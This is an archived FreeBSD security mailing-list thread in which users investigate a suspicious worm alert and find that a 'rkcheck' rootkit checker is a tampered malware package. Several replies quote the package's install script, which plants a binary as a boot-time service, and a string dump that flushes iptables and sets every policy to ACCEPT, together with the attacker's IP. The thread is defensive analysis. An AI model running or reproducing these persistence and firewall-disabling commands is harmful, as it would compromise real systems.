YmluL3NoDQppcHRhYmxlcyAtWCAyPiAvZGV2L251bGwNCmlwdGFibGVzIC1GIDI+IC9kZXYvbnVs bA0KaXB0YWJsZXMgLXQgbmF0IC1GIDI+IC9kZXYvbnVsbA0KaXB0YWJsZXMgLXQgbmF0IC1YIDI+ IC9kZXYvbnVsbA0KaXB0YWJsZXMgLXQgbWFuZ2xlIC1GIDI+IC9kZXYvbnVsbA0KaXB0YWJsZXMg LXQgbWFuZ2xlIC1YIDI+IC9kZXYvbnVsbA0KaXB0YWJsZXMgLVAgSU5QVVQgQUNDRVBUIDI+IC9k ZXYvbnVsbA0KaXB0YWJsZXMgLVAgRk9SV0FSRCBBQ0NFUFQgMj4gL2Rldi9udWxsDQppcHRhYmxl cyAtUCBPVVRQVVQgQUNDRVBUIDI+IC9kZXYvbnVsbA0KdWRldmQNCjk1LjIxNS40NC4xOTUNCjsq MyQiDQoNCj4gQ2hlZXJzLA0KPiANCj4gUGhpbGlwDQoNCkNocmlz From owner-freebsd-security@FreeBSD.ORG Wed Feb 25 21:04:49 2015 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) (using TLSv1.2 with cipher AECDH-AES256-SHA (256/256 bits)) (No client certificate requested) by hub.freebsd.org (Postfix) with ESMTPS id 5FBE2BA4 for ; Wed, 25 Feb 2015 21:04:49 +0000 (UTC) Received: from mx2.nkhosting.net (mx2.nkhosting.net [109.75.177.32]) by mx1.freebsd.org (Postfix) with ESMTP id 164AF91E for ; Wed, 25 Feb 2015 21:04:48 +0000 (UTC) Received: from mx2filter1.nkhosting.net (unknown [109.75.177.32]) by mx2.nkhosting.net (Postfix) with ESMTP id 04E532D64136; Wed, 25 Feb 2015 22:04:47 +0100 (CET) X-Virus-Scanned: amavisd-new at mx2.nkhosting.net X-Spam-Flag: NO X-Spam-Score: -2.9 X-Spam-Level: X-Spam-Status: No, score=-2.9 tagged_above=-999 required=6.2 tests=[ALL_TRUSTED=-1, BAYES_00=-1.9] autolearn=ham autolearn_force=no Received: from mx2.nkhosting.net ([109.75.177.32]) by mx2filter1.nkhosting.net (mx2filter1.nkhosting.net [109.75.177.32]) (amavisd-new, port 10024) with ESMTP id k-jSo9W-yxPY; Wed, 25 Feb 2015 22:04:44 +0100 (CET) Received: from air13.t19.nkhosting.net (f053177190.adsl.alicedsl.de [78.53.177.190]) by mx2.nkhosting.net (Postfix) with ESMTPSA id A6DE72D631A7; Wed, 25 Feb 2015 22:04:44 +0100 (CET) Content-Type: text/plain; charset=utf-8 Mime-Version: 1.0 (Mac OS X Mail 8.1 \(1993\)) Subject: Re: has my 10.1-RELEASE system been compromised From: Philip Jocks In-Reply-To: <30A97E9B-5719-4DA3-ADFB-24A3FADF6D3C@schulte.org> Date: Wed, 25 Feb 2015 22:04:46 +0100 Content-Transfer-Encoding: quoted-printable Message-Id: <5FCD7882-9BED-4101-9722-D174AC5347E3@netzkommune.com> References: <864mq9zsmm.fsf@gly.ftfl.ca> <54EE2A19.7050108@FreeBSD.org> <86vbipycyc.fsf@gly.ftfl.ca> <1B20A559-59C5-477A-A2F3-9FD7E16C09E8@netzkommune.com> <86k2z5yc03.fsf@gly.ftfl.ca> <4EE57C1F-AB10-4BF1-A193-DB9C75A586FC@netzkommune.com> <30A97E9B-5719-4DA3-ADFB-24A3FADF6D3C@schulte.org> To: "freebsd-security@freebsd.org" X-Mailer: Apple Mail (2.1993) Cc: Joseph Mingrone X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.18-1 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 25 Feb 2015 21:04:49 -0000 > Am 25.02.2015 um 21:55 schrieb Christopher Schulte = : >=20 >=20 >> On Feb 25, 2015, at 2:34 PM, Philip Jocks = wrote: >>=20 >> it felt pretty scammy to me, googling for the "worm" got me to = rkcheck.org which was registered a few days ago and looks like a = tampered version of chkrootkit. I hope, nobody installed it anywhere, it = seems to execute rkcheck/tests/.unit/test.sh which contains=20 >>=20 >> #!/bin/bash >>=20 >> cp tests/.unit/test /usr/bin/rrsyncn >> chmod +x /usr/bin/rrsyncn >> rm -fr /etc/rc2.d/S98rsyncn >> ln -s /usr/bin/rrsyncn /etc/rc2.d/S98rsyncn >> /usr/bin/rrsyncn >> exit >>=20 >> That doesn't look like something you'd want on your box=E2=80=A6 >=20 > I filed a report with Google about that domain (Google Safe Browsing), = briefly describing what=E2=80=99s been recounted here on this thread. = It seems quite suspicious, agreed. >=20 > Has anyone started an analysis of the rrsyncn binary? The last few = lines of a simple string dump are interesting=E2=80=A6 take note what = looks to be an IP address of 95.215.44.195. >=20 > /bin/sh > iptables -X 2> /dev/null > iptables -F 2> /dev/null > iptables -t nat -F 2> /dev/null > iptables -t nat -X 2> /dev/null > iptables -t mangle -F 2> /dev/null > iptables -t mangle -X 2> /dev/null > iptables -P INPUT ACCEPT 2> /dev/null > iptables -P FORWARD ACCEPT 2> /dev/null > iptables -P OUTPUT ACCEPT 2> /dev/null > udevd > 95.215.44.195 > ;*3$" 95.215.44.195 is the IP of rkcheck.org. I contacted the yourserver.se = who own the network. Philip From owner-freebsd-security@FreeBSD.ORG Wed Feb 25 21:07:27 2015 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) (using TLSv1.2 with cipher AECDH-AES256-SHA (256/256 bits)) (No client certificate requested) by hub.freebsd.org (Postfix) with ESMTPS id 1FF56D1C for ; Wed, 25 Feb 2015 21:07:27 +0000 (UTC) Received: from plane.gmane.org (plane.gmane.org [80.91.229.3]) (using TLSv1 with cipher AES256-SHA (256/256 bits)) (Client did not present a certificate) by mx1.freebsd.org (Postfix) with ESMTPS id CAA5C968 for ; Wed, 25 Feb 2015 21:07:26 +0000 (UTC) Received: from list by plane.gmane.org with local (Exim 4.69) (envelope-from ) id 1YQjAt-00078g-TX for freebsd-security@freebsd.org; Wed, 25 Feb 2015 22:07:20 +0100 Received: from dynamic34-29.dynamic.dal.ca ([129.173.34.203]) by main.gmane.org with esmtp (Gmexim 0.1 (Debian)) id 1AlnuQ-0007hv-00 for ; Wed, 25 Feb 2015 22:07:19 +0100 Received: from jrm by dynamic34-29.dynamic.dal.ca with local (Gmexim 0.1 (Debian)) id 1AlnuQ-0007hv-00 for ; Wed, 25 Feb 2015 22:07:19 +0100 X-Injected-Via-Gmane: http://gmane.org/ To: freebsd-security@freebsd.org From: Joseph Mingrone Subject: Re: has my 10.1-RELEASE system been compromised Date: Wed, 25 Feb 2015 17:07:05 -0400 Lines: 40 Message-ID: <864mq9ya2u.fsf@gly.ftfl.ca> References: <864mq9zsmm.fsf@gly.ftfl.ca> <54EE2A19.7050108@FreeBSD.org> <86vbipycyc.fsf@gly.ftfl.ca> <1B20A559-59C5-477A-A2F3-9FD7E16C09E8@netzkommune.com> <86k2z5yc03.fsf@gly.ftfl.ca> <4EE57C1F-AB10-4BF1-A193-DB9C75A586FC@netzkommune.com> <30A97E9B-5719-4DA3-ADFB-24A3FADF6D3C@schulte.org> Mime-Version: 1.0 Content-Type: text/plain X-Complaints-To: usenet@ger.gmane.org X-Gmane-NNTP-Posting-Host: dynamic34-29.dynamic.dal.ca User-Agent: Gnus/5.13 (Gnus v5.13) Emacs/24.4 (berkeley-unix) Cancel-Lock: sha1:0KpUGi2nr2K7RVN3xvtUdX2zHoQ= X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.18-1 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 25 Feb 2015 21:07:27 -0000 Christopher Schulte writes: >> On Feb 25, 2015, at 2:34 PM, Philip Jocks wrote: >> >> it felt pretty scammy to me, googling for the "worm" got me to rkcheck.org >> which was registered a few days ago and looks like a tampered version of >> chkrootkit. I hope, nobody installed it anywhere, it seems to execute >> rkcheck/tests/.unit/test.sh which contains >> >> #!/bin/bash >> >> cp tests/.unit/test /usr/bin/rrsyncn >> chmod +x /usr/bin/rrsyncn >> rm -fr /etc/rc2.d/S98rsyncn >> ln -s /usr/bin/rrsyncn /etc/rc2.d/S98rsyncn >> /usr/bin/rrsyncn >> exit Are you looking at the tarball from the "source code" link, http://rkcheck.org/download.php?file=rkcheck-1.4.3-src.tar.gz? % tar -xvf rkcheck-1.4.3-src.tar.gz x rkcheck/ x rkcheck/chkdirs.c x rkcheck/README.chklastlog x rkcheck/README.chkwtmp x rkcheck/chkutmp.c x rkcheck/chkrootkit x rkcheck/chkrootkit.lsm x rkcheck/check_wtmpx.c x rkcheck/COPYRIGHT x rkcheck/strings.c x rkcheck/ifpromisc.c x rkcheck/ACKNOWLEDGMENTS x rkcheck/chklastlog.c: truncated gzip input tar: Error exit delayed from previous errors. I don't see a /tests/ directory or any directory under rkcheck. Joseph From owner-freebsd-security@FreeBSD.ORG Wed Feb 25 21:11:40 2015 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) (using TLSv1.2 with cipher AECDH-AES256-SHA (256/256 bits)) (No client certificate requested) by hub.freebsd.org (Postfix) with ESMTPS id 8EC48F9B for ; Wed, 25 Feb 2015 21:11:40 +0000 (UTC) Received: from mx2.nkhosting.net (mx2.nkhosting.net [109.75.177.32]) by mx1.freebsd.org (Postfix) with ESMTP id 4581DA43 for ; Wed, 25 Feb 2015 21:11:40 +0000 (UTC) Received: from mx2filter1.nkhosting.net (unknown [109.75.177.32]) by mx2.nkhosting.net (Postfix) with ESMTP id DF73C2D64136; Wed, 25 Feb 2015 22:11:38 +0100 (CET) X-Virus-Scanned: amavisd-new at mx2.nkhosting.net X-Spam-Flag: NO X-Spam-Score: -2.9 X-Spam-Level: X-Spam-Status: No, score=-2.9 tagged_above=-999 required=6.2 tests=[ALL_TRUSTED=-1, BAYES_00=-1.9] autolearn=ham autolearn_force=no Received: from mx2.nkhosting.net ([109.75.177.32]) by mx2filter1.nkhosting.net (mx2filter1.nkhosting.net [109.75.177.32]) (amavisd-new, port 10024) with ESMTP id a_h3Wf12V0fH; Wed, 25 Feb 2015 22:11:36 +0100 (CET) Received: from air13.t19.nkhosting.net (f053177190.adsl.alicedsl.de [78.53.177.190]) by mx2.nkhosting.net (Postfix) with ESMTPSA id 73C862D631A7; Wed, 25 Feb 2015 22:11:36 +0100 (CET) Content-Type: text/plain; charset=us-ascii Mime-Version: 1.0 (Mac OS X Mail 8.1 \(1993\)) Subject: Re: has my 10.1-RELEASE system been compromised From: Philip Jocks In-Reply-To: <864mq9ya2u.fsf@gly.ftfl.ca> Date: Wed, 25 Feb 2015 22:11:37 +0100 Content-Transfer-Encoding: quoted-printable Message-Id: References: <864mq9zsmm.fsf@gly.ftfl.ca> <54EE2A19.7050108@FreeBSD.org> <86vbipycyc.fsf@gly.ftfl.ca> <1B20A559-59C5-477A-A2F3-9FD7E16C09E8@netzkommune.com> <86k2z5yc03.fsf@gly.ftfl.ca> <4EE57C1F-AB10-4BF1-A193-DB9C75A586FC@netzkommune.com> <30A97E9B-5719-4DA3-ADFB-24A3FADF6D3C@schulte.org> <864mq9ya2u.fsf@gly.ftfl.ca> To: Joseph Mingrone X-Mailer: Apple Mail (2.1993) Cc: freebsd-security@freebsd.org X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.18-1 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 25 Feb 2015 21:11:40 -0000 > Am 25.02.2015 um 22:07 schrieb Joseph Mingrone : >=20 > Christopher Schulte writes: >=20 >>> On Feb 25, 2015, at 2:34 PM, Philip Jocks = wrote: >>>=20 >>> it felt pretty scammy to me, googling for the "worm" got me to = rkcheck.org >>> which was registered a few days ago and looks like a tampered = version of >>> chkrootkit. I hope, nobody installed it anywhere, it seems to = execute >>> rkcheck/tests/.unit/test.sh which contains >>>=20 >>> #!/bin/bash >>>=20 >>> cp tests/.unit/test /usr/bin/rrsyncn >>> chmod +x /usr/bin/rrsyncn >>> rm -fr /etc/rc2.d/S98rsyncn >>> ln -s /usr/bin/rrsyncn /etc/rc2.d/S98rsyncn >>> /usr/bin/rrsyncn >>> exit >=20 > Are you looking at the tarball from the "source code" link, > http://rkcheck.org/download.php?file=3Drkcheck-1.4.3-src.tar.gz? >=20 > % tar -xvf rkcheck-1.4.3-src.tar.gz=20 > x rkcheck/ > x rkcheck/chkdirs.c > x rkcheck/README.chklastlog > x rkcheck/README.chkwtmp > x rkcheck/chkutmp.c > x rkcheck/chkrootkit > x rkcheck/chkrootkit.lsm > x rkcheck/check_wtmpx.c > x rkcheck/COPYRIGHT > x rkcheck/strings.c > x rkcheck/ifpromisc.c > x rkcheck/ACKNOWLEDGMENTS > x rkcheck/chklastlog.c: truncated gzip input > tar: Error exit delayed from previous errors. >=20 > I don't see a /tests/ directory or any directory under rkcheck. the "source code" tar is broken intentionally, I guess, so that people = install the binaries. The stuff I posted was from the binary tar files = which contain shell scripts etc. Philip From owner-freebsd-security@FreeBSD.ORG Wed Feb 25 21:52:22 2015 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) (using TLSv1.2 with cipher AECDH-AES256-SHA (256/256 bits)) (No client certificate requested) by hub.freebsd.org (Postfix) with ESMTPS id D8A96DDD for ; Wed, 25 Feb 2015 21:52:22 +0000 (UTC) Received: from plane.gmane.org (plane.gmane.org [80.91.229.3]) (using TLSv1 with cipher AES256-SHA (256/256 bits)) (Client did not present a certificate) by mx1.freebsd.org (Postfix) with ESMTPS id 9238EE8C for ; Wed, 25 Feb 2015 21:52:22 +0000 (UTC) Received: from list by plane.gmane.org with local (Exim 4.69) (envelope-from ) id 1YQjsQ-0003DW-FU for freebsd-security@freebsd.org; Wed, 25 Feb 2015 22:52:18 +0100 Received: from dynamic34-29.dynamic.dal.ca ([129.173.34.203]) by main.gmane.org with esmtp (Gmexim 0.1 (Debian)) id 1AlnuQ-0007hv-00 for ; Wed, 25 Feb 2015 22:52:18 +0100 Received: from jrm by dynamic34-29.dynamic.dal.ca with local (Gmexim 0.1 (Debian)) id 1AlnuQ-0007hv-00 for ; Wed, 25 Feb 2015 22:52:18 +0100 X-Injected-Via-Gmane: http://gmane.org/ To: freebsd-security@freebsd.org From: Joseph Mingrone Subject: Re: has my 10.1-RELEASE system been compromised Date: Wed, 25 Feb 2015 17:52:09 -0400 Lines: 40 Message-ID: <86a901wtfa.fsf@gly.ftfl.ca> References: <864mq9zsmm.fsf@gly.ftfl.ca> <32202C62-3CED-49B6-8259-0B18C52159D1@spam.lifeforms.nl> Mime-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 8bit X-Complaints-To: usenet@ger.gmane.org X-Gmane-NNTP-Posting-Host: dynamic34-29.dynamic.dal.ca User-Agent: Gnus/5.13 (Gnus v5.13) Emacs/24.4 (berkeley-unix) Cancel-Lock: sha1:x1oXavWPFs+bsLdZ2Q6gAGLUClA= X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.18-1 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 25 Feb 2015 21:52:22 -0000 Walter Hop writes: > If this traffic is originating from your system, and you were running > PHP, I’d say it’s probably most likely that some PHP > script/application on your host was compromised. Were you running > stuff like phpMyAdmin, Wordpress or Drupal that might not have been > updated too often? I was running almost nothing with php except <?php echo $_SERVER['HTTP_HOST']?> on one page. I was recently testing out mediawiki. IIRC I installed it via the port, but uninstalled it almost immediately. I saw today that there was still a mediawiki directory left over with a timestamp of 2014-12-30 and one php file, LocalSettings.php. > Often in such a compromise, the attacker leaves traces in the > filesystem, like executable scripts or temp files. Try to look for new > files which are owned by the webserver or fastcgi process, see if you > find some surprises. > > Example: > # touch -t 201501010000 foo > # find / -user www -newer foo > > If you don’t find anything, look back a little further. > Hopefully you will find a clue in this way. # touch -t 201412250000 foo # find / -user www -newer foo turned up a few directories under /var/tmp/nginx, but they were all empty. The timestamps were the same as the mediawiki directory. Nothing interesting turned up in the output when I uninstalled the php or spawn-fcgi packages. Thanks, Joseph From owner-freebsd-security@FreeBSD.ORG Wed Feb 25 22:10:41 2015 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [8.8.178.115]) (using TLSv1.2 with cipher AECDH-AES256-SHA (256/256 bits)) (No client certificate requested) by hub.freebsd.org (Postfix) with ESMTPS id 570CF803 for ; Wed, 25 Feb 2015 22:10:41 +0000 (UTC) Received: from outgoing.tristatelogic.com (segfault.tristatelogic.com [69.62.255.118]) by mx1.freebsd.org (Postfix) with ESMTP id 2F454DB for ; Wed, 25 Feb 2015 22:10:40 +0000 (UTC) Received: from segfault-nmh-helo.tristatelogic.com (localhost [127.0.0.1]) by segfault.tristatelogic.com (Postfix) with ESMTP id 08C0D3AEF8 for ; Wed, 25 Feb 2015 14:05:04 -0800 (PST) From: "Ronald F. Guilmette" To: "freebsd-security@freebsd.org" Subject: Re: has my 10.1-RELEASE system been compromised In-Reply-To: <30A97E9B-5719-4DA3-ADFB-24A3FADF6D3C@schulte.org> Date: Wed, 25 Feb 2015 14:05:04 -0800 Message-ID: <7808.1424901904@server1.tristatelogic.com> X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.18-1 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 25 Feb 2015 22:10:41 -0000 Note: 95.215.44.195 == rkcheck.org The web site certainly smells like a total scam... no indication whatsoever of who might be behind this allegedly helpful project. But they'd like me to just trust them and download their checker tool. Yea. Right. No thanks. But I give them an `E' for effort. From owner-freebsd-security@FreeBSD.ORG Thu Feb 26 08:24:04 2015 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [8.8.178.115]) (using TLSv1.2 with cipher AECDH-AES256-SHA (256/256 bits)) (No client certificate requested) by hub.freebsd.org (Postfix) with ESMTPS id 801CDE5F; Thu, 26 Feb 2015 08:24:04 +0000 (UTC) Received: from mail.in-addr.com (mail.in-addr.com [IPv6:2a01:4f8:191:61e8::2525:2525]) (using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits)) (Client did not present a certificate) by mx1.freebsd.org (Postfix) with ESMTPS id 416ECDCB; Thu, 26 Feb 2015 08:24:04 +0000 (UTC) Received: from gjp by mail.in-addr.com with local (Exim 4.85 (FreeBSD)) (envelope-from ) id 1YQtjk-000MYw-Nv; Thu, 26 Feb 2015 08:24:00 +0000 Date: Thu, 26 Feb 2015 08:24:00 +0000 From: Gary Palmer To: Joseph Mingrone Subject: Re: has my 10.1-RELEASE system been compromised Message-ID: <20150226082400.GE29176@in-addr.com> References: <864mq9zsmm.fsf@gly.ftfl.ca> <54EE2A19.7050108@FreeBSD.org> <86vbipycyc.fsf@gly.ftfl.ca> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <86vbipycyc.fsf@gly.ftfl.ca> X-SA-Exim-Connect-IP: X-SA-Exim-Mail-From: gpalmer@freebsd.org X-SA-Exim-Scanned: No (on mail.in-addr.com); SAEximRunCond expanded to false Cc: freebsd-security@freebsd.org, Jung-uk Kim X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.18-1 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 26 Feb 2015 08:24:04 -0000 On Wed, Feb 25, 2015 at 04:04:59PM -0400, Joseph Mingrone wrote: > Jung-uk Kim writes: > > > On 02/25/2015 14:41, Joseph Mingrone wrote: > >> This morning when I arrived at work I had this email from my > >> university's IT department (via email.it) informing me that my host > >> was infected and spreading a worm. > >> > >> "Based on the logs fingerprints seems that your server is infected > >> by the following worm: Net-Worm.PHP.Mongiko.a" > >> > >> my ip here - - [23/Feb/2015:14:53:37 +0100] "POST > >> /?cmd=info&key=f8184c819717b6815a8b8037e91c59ef&ip=212.97.34.7 > >> HTTP/1.1" 200 429 "-" "Net- Worm.PHP.Mongiko.a" > >> > >> Despite the surprising name, I don't see any evidence that it's > >> related to php. I did remove php, because I don't really need it. > >> I've included my /etc/rc.conf below. pkg audit doesn't show any > >> vulnerabilities. Searching for Worm.PHP.Mongiko doesn't show > >> much. I've run chkrootkit, netstat/sockstat and I don't see > >> anything suspicious and I plan to finally put some reasonable > >> firewall rules on this host. > >> > >> Do you have any suggestions? Should I include any other > >> information here? > > ... > > > > I found this: > > > > http://security.stackexchange.com/questions/82273/what-is-net-worm-php-mongiko-trying-to-do > > > > Jung-uk Kim > > Yeah, I saw that as well. I wouldn't be concerned if this was hitting > my web server, but the key difference here is that my IP is the > apparently the source in this case. Did you see the part of the link that said the alert was likely a scam? Sounds to me like the people who cold call people and tell them their Windows computer is broken have moved on. The fact your Uni's IT department sent an e-mail from email.it smells extremely suspicious to me. Why would they use a 3rd party e-mail solution instead of their own email system? Call your Uni's IT department and confirm the report came from them. Gary From owner-freebsd-security@FreeBSD.ORG Thu Feb 26 09:04:21 2015 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [8.8.178.115]) (using TLSv1.2 with cipher AECDH-AES256-SHA (256/256 bits)) (No client certificate requested) by hub.freebsd.org (Postfix) with ESMTPS id CF310517; Thu, 26 Feb 2015 09:04:21 +0000 (UTC) Received: from mail.tdx.com (mail.tdx.com [62.13.128.18]) by mx1.freebsd.org (Postfix) with ESMTP id 981E322F; Thu, 26 Feb 2015 09:04:20 +0000 (UTC) Received: from [10.12.30.106] (vpn01-01.tdx.co.uk [62.13.130.213]) (authenticated bits=0) by mail.tdx.com (8.14.3/8.14.3/) with ESMTP id t1Q94IfL015172 (version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=NO); Thu, 26 Feb 2015 09:04:19 GMT Date: Thu, 26 Feb 2015 09:04:18 +0000 From: Karl Pielorz To: Remko Lodder Subject: Re: FreeBSD Security Advisory FreeBSD-SA-15:04.igmp (fwd) - ipfw fix? Message-ID: In-Reply-To: <1BE461E0-D2AC-4222-8D41-B7F97E83FD74@FreeBSD.org> References: <1BE461E0-D2AC-4222-8D41-B7F97E83FD74@FreeBSD.org> X-Mailer: Mulberry/4.0.8 (Win32) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline Cc: freebsd-security@freebsd.org X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.18-1 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 26 Feb 2015 09:04:21 -0000 --On 25 February 2015 18:21 +0100 Remko Lodder wrote: > This suggests that you can filter the traffic: > > Block incoming IGMP packets by protecting your host/networks with a > firewall. (Quote from the SA). It does, but it doesn't specifically say whether ipfw on *the host that's being protected* is sufficient I'd imagine in some scenarios that won't work (because the host simply receiving a malformed packet would cause issues) - so was just getting it clarified that an ipfw rule on the vulnerable *host itself* blocking igmp (any to any) is sufficient in this case. i.e. You don't need a 'external' firewall sat in front of the hosts to do that job. -Karl From owner-freebsd-security@FreeBSD.ORG Thu Feb 26 09:37:24 2015 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) (using TLSv1.2 with cipher AECDH-AES256-SHA (256/256 bits)) (No client certificate requested) by hub.freebsd.org (Postfix) with ESMTPS id A091E3FD; Thu, 26 Feb 2015 09:37:24 +0000 (UTC) Received: from mx2.nkhosting.net (mx2.nkhosting.net [109.75.177.32]) by mx1.freebsd.org (Postfix) with ESMTP id 58E2F7ED; Thu, 26 Feb 2015 09:37:23 +0000 (UTC) Received: from mx2filter1.nkhosting.net (unknown [109.75.177.32]) by mx2.nkhosting.net (Postfix) with ESMTP id D52122D64123; Thu, 26 Feb 2015 10:37:21 +0100 (CET) X-Virus-Scanned: amavisd-new at mx2.nkhosting.net X-Spam-Flag: NO X-Spam-Score: -2.9 X-Spam-Level: X-Spam-Status: No, score=-2.9 tagged_above=-999 required=6.2 tests=[ALL_TRUSTED=-1, BAYES_00=-1.9] autolearn=ham autolearn_force=no Received: from mx2.nkhosting.net ([109.75.177.32]) by mx2filter1.nkhosting.net (mx2filter1.nkhosting.net [109.75.177.32]) (amavisd-new, port 10024) with ESMTP id E3eHD8mLotFE; Thu, 26 Feb 2015 10:37:15 +0100 (CET) Received: from imac.t19.nkhosting.net (g228132172.adsl.alicedsl.de [92.228.132.172]) by mx2.nkhosting.net (Postfix) with ESMTPSA id DDFF32D64143; Thu, 26 Feb 2015 10:37:15 +0100 (CET) Content-Type: text/plain; charset=us-ascii Mime-Version: 1.0 (Mac OS X Mail 6.6 \(1510\)) Subject: Re: has my 10.1-RELEASE system been compromised From: Philip Jocks In-Reply-To: <20150226082400.GE29176@in-addr.com> Date: Thu, 26 Feb 2015 10:37:15 +0100 Content-Transfer-Encoding: quoted-printable Message-Id: References: <864mq9zsmm.fsf@gly.ftfl.ca> <54EE2A19.7050108@FreeBSD.org> <86vbipycyc.fsf@gly.ftfl.ca> <20150226082400.GE29176@in-addr.com> To: Gary Palmer X-Mailer: Apple Mail (2.1510) Cc: Joseph Mingrone , freebsd-security@freebsd.org, Jung-uk Kim X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.18-1 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 26 Feb 2015 09:37:24 -0000 Am 26.02.2015 um 09:24 schrieb Gary Palmer : > On Wed, Feb 25, 2015 at 04:04:59PM -0400, Joseph Mingrone wrote: >> Jung-uk Kim writes: >>=20 >>> On 02/25/2015 14:41, Joseph Mingrone wrote: >>>> This morning when I arrived at work I had this email from my=20 >>>> university's IT department (via email.it) informing me that my host >>>> was infected and spreading a worm. >>>>=20 >>>> "Based on the logs fingerprints seems that your server is infected >>>> by the following worm: Net-Worm.PHP.Mongiko.a" >>>>=20 >>>> my ip here - - [23/Feb/2015:14:53:37 +0100] "POST=20 >>>> /?cmd=3Dinfo&key=3Df8184c819717b6815a8b8037e91c59ef&ip=3D212.97.34.7 >>>> HTTP/1.1" 200 429 "-" "Net- Worm.PHP.Mongiko.a" >>>>=20 >>>> Despite the surprising name, I don't see any evidence that it's >>>> related to php. I did remove php, because I don't really need it. >>>> I've included my /etc/rc.conf below. pkg audit doesn't show any=20 >>>> vulnerabilities. Searching for Worm.PHP.Mongiko doesn't show >>>> much. I've run chkrootkit, netstat/sockstat and I don't see >>>> anything suspicious and I plan to finally put some reasonable >>>> firewall rules on this host. >>>>=20 >>>> Do you have any suggestions? Should I include any other >>>> information here? >>> ... >>>=20 >>> I found this: >>>=20 >>> = http://security.stackexchange.com/questions/82273/what-is-net-worm-php-mon= giko-trying-to-do >>>=20 >>> Jung-uk Kim >>=20 >> Yeah, I saw that as well. I wouldn't be concerned if this was = hitting >> my web server, but the key difference here is that my IP is the >> apparently the source in this case. >=20 > Did you see the part of the link that said the alert was likely a = scam? > Sounds to me like the people who cold call people and tell them their = Windows > computer is broken have moved on. the thing about the scam was posted by a friend after Joseph's post to = the freebsd-security mailing list so people on stackexchange will be = warned as well. Philip From owner-freebsd-security@FreeBSD.ORG Thu Feb 26 15:40:10 2015 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) (using TLSv1.2 with cipher AECDH-AES256-SHA (256/256 bits)) (No client certificate requested) by hub.freebsd.org (Postfix) with ESMTPS id DB01C285 for ; Thu, 26 Feb 2015 15:40:10 +0000 (UTC) Received: from sola.nimnet.asn.au (paqi.nimnet.asn.au [115.70.110.159]) (using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits)) (Client did not present a certificate) by mx1.freebsd.org (Postfix) with ESMTPS id 2F10582F for ; Thu, 26 Feb 2015 15:40:09 +0000 (UTC) Received: from localhost (localhost [127.0.0.1]) by sola.nimnet.asn.au (8.14.2/8.14.2) with ESMTP id t1QFe593005754; Fri, 27 Feb 2015 02:40:05 +1100 (EST) (envelope-from smithi@nimnet.asn.au) Date: Fri, 27 Feb 2015 02:40:05 +1100 (EST) From: Ian Smith To: Christopher Schulte Subject: Re: has my 10.1-RELEASE system been compromised In-Reply-To: <30A97E9B-5719-4DA3-ADFB-24A3FADF6D3C@schulte.org> Message-ID: <20150227022821.P38620@sola.nimnet.asn.au> References: <864mq9zsmm.fsf@gly.ftfl.ca> <54EE2A19.7050108@FreeBSD.org> <86vbipycyc.fsf@gly.ftfl.ca> <1B20A559-59C5-477A-A2F3-9FD7E16C09E8@netzkommune.com> <86k2z5yc03.fsf@gly.ftfl.ca> <4EE57C1F-AB10-4BF1-A193-DB9C75A586FC@netzkommune.com> <30A97E9B-5719-4DA3-ADFB-24A3FADF6D3C@schulte.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=ISO-8859-1 Content-Transfer-Encoding: 8BIT X-Content-Filtered-By: 